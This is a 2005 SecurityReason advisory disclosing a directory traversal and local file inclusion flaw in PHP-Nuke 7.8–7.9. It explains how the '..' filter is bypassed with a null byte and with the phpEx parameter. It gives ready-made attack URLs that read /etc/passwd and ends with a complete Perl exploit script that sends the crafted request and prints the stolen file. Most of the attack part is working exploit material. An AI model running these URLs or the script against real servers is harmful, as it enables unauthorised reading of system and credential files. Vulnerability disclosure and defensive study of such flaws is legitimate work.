Author: sp3x
Date: 19. October 2005

Affected software :
===================
PHPNuke version : 7.8 - 7.9 + patch 3.1

Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online community or w
hatever you want to call it. The goal of PHP-Nuke is to have an automated web site to dist
ribute news and articles with users system. Each user can submit comments to discuss the a
rticles, just similar to Slashdot and many others. Main features include: web based admin,
surveys, top page, access stats page with counter, user customizable box, themes manager 
for registered users, friendly administration GUI with graphic topic manager, option to ed
it or delete stories, option to delete comments, moderation system, Referers page to know 
who link us, sections manager, customizable HTML blocks, user and authors edit, an integra
ted Banners Ads system, search engine, backend/headlines generation (RSS/RDF format), and 
many, many more friendly functions. PHP-Nuke is written 100% in PHP and requires Apache We
b server, PHP and a SQL (MySQL, mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase).
Support for 25 languages, Yahoo like search engine, Comments option in Polls, lot of them
es, Ephemerids manager, File Manager, Headlines, download manager, faq manager, advanced b
locks systems, reviews system, newsletter, categorized articles, multilanguage content man
agement, phpBB Forums included and a lot more.

Vulnerabilities :
*****************

File disclosure :
=================

By GET or POST request remote attacker can make specially crafted parameter to see the fil
es on the victim server. 
In our case in php.ini the magic_quotes_gpc must be off.

Environment :
------------- 
php.ini: magic_quotes_gpc = Off

The problem exist in modules.php so first let's see the source code of this file.

Original code from modules.php :
---------------------------------
...
if (!isset($file) OR $file != $_REQUEST['file']) $file="index";
if (stripos_clone($file,"..") OR stripos_clone($mop,"..")) die("You are so cool..
.");
....
-----------------------------------

Here we can see that there is function stripos_clone(); to filter variable $file, $mop to 
detect and prevent 
Remote Directory Traversal - Local file include. So when user set variable $file, $mop the
function start filter ".." .
Ok lets see the function stripos_clone(); code in mainfile.php :
--------
// We want to use the function stripos,
// but thats only available since PHP5.
// So we cloned the function...
if(!function_exists('stripos')) {
function stripos_clone($haystack, $needle, $offset=0) {
return strpos(strtoupper($haystack), strtoupper($needle), $offset);
}
} else {
// But when this is PHP5, we use the original function 
function stripos_clone($haystack, $needle, $offset=0) {
return stripos($haystack, $needle, $offset=0);
}
}
--------

Now lets do some test : 

http://victim/[nuke_dir]/modules.php?name=Search&file=index/../

After this we will see the message : 
------------------------------------
You are so cool...
------------------------------------

Everything goes fine but when we try :

http://victim/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passw
d%00

Then we get /etc/passwd from server .

Another method to see file when server have magic_quotes_gpc = On .

Environment :
------------- 
php.ini: magic_quotes_gpc = On

Some phpnuke version do not include all phpbb forum. When in phpnuke directory is missing 
file extension.inc
in modules/Forums/ then we can use variable $phpEx to include file from server . 

Example :

http://victim/[nuke_dir]/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../.
./../../etc/passwd


Exploit :
---------

http://securityreason.com/achievement_exploitalert/3

How to fix :
============

Download the new version of the script or update.
http://securityreason.com/download/1/4

Greetz :
========

Special greetz : cXIb8O3 , pkw

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com 

-------

#!/usr/bin/perl
use IO::Socket;

# SecurityReason Exploit Code
# by sp3x
# sp3x@securityreason.com
# www.securityreason.com
# Remote Directory Traversal Exploit - Local file include 
# PHPNuke -> 7.8 full patched , 7.9 fullpatched + patch 3.1
# Server must have magic_quotes_gpc = Off - need to use %00
# Copyright © SecurityReason. All Rights Reserved.
#
# Example of usage : perl phpnuke-expl.pl 172.24.2.1 nukedir Search ../../../etc/passwd

if (@ARGV < 3)
{
print "\r\n";
print "SecurityReason - www.securityreason.com\r\n";
print "[sp3x] EXPLOIT for PHPNuke 7.8 - 7.9\r\n";
print " \r\n";
print "perl phpnuke-expl.pl [Host] [nuke_dir] [file]\r\n\r\n";
print "[Host] - Host where is phpnuke example: http://localhost\r\n";
print "[nuke_dir] - Directory of PHPNuke example: /phpnuke/html/\r\n";
print "[module] - Module of PHPNuke example: News\r\n";
print "[file] - file to show - example : ../../../../../etc/passwd\r\n\r\n";
print "Example of usage : perl phpnuke-expl.pl 172.24.2.1 nukedir module ../../../../../e
tc/passwd";
print "\r\n";
exit();
}

$HOST = $ARGV[0];
$DIR = $ARGV[1]."modules.php";
$MODULE = "?name=".$ARGV[2]."&";
$FILE = "file=".$ARGV[3]."%00";
$LENGTH = length $FILE;

print "\r\n[Host] : ".$HOST."\n";
print "[Dir] : ".$DIR."\n";
print "[Module] : ".$ARGV[2]."\n";
print "[File] : ".$ARGV[3]."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80"

) || die "Error 404\r\n\r\n";

print $get1 "GET ".$DIR.$MODULE.$FILE." HTTP/1.0\n";
print $get1 "Host: ".$HOST."\n";

print $get1 "User-Agent: Mozilla/5.0 - SecurityReason";
print $get1 "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/
plain;q=0.8,image/png,*/*;q=0.5";
print $get1 "Accept-Language: pl,en-us;q=0.7,en;q=0.3";
print $get1 "Accept-Encoding: gzip,deflate";
print $get1 "Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7";
print $get1 "Keep-Alive: 300";
print $get1 "Cookie: lang=english";
print $get1 "Cache-Control: max-age=0";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";

print $get1 $FILE;

while ($odp = <$get1>)
{
if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) {
printf "\n\nFile ".$ARGV[2]." doesn't exists or something goes wrong.\r\n\r\n";

exit;
}

printf $odp;
}